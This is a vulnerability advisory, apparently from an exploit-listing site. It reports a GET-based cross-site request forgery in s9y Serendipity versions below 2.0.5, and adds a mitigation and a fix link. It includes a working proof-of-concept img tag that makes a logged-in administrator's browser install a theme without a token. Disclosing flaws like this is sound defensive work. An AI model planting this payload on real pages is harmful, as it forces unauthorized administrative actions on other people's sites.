s9y Serendipity Cross Site Request Forgery

2017.04.12

Credit: Zhiyang Zeng

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

Details

======

Software: s9y Serendipity

Version: <2.0.5

Homepage: https://docs.s9y.org/

=======

Description

================

Get type CSRF in Serendipity allows attacker installs any themes, no token here.

POC:

========

include this in the page ,then attack will occur:

<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>

Mitigations

=======

update to Serendipity v2.1.x

========

FIX:

==========

https://github.com/s9y/Serendipity/issues/452

Best regards,

Zhiyang Zeng of Tencent security platform department

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

s9y Serendipity Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

s9y Serendipity Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.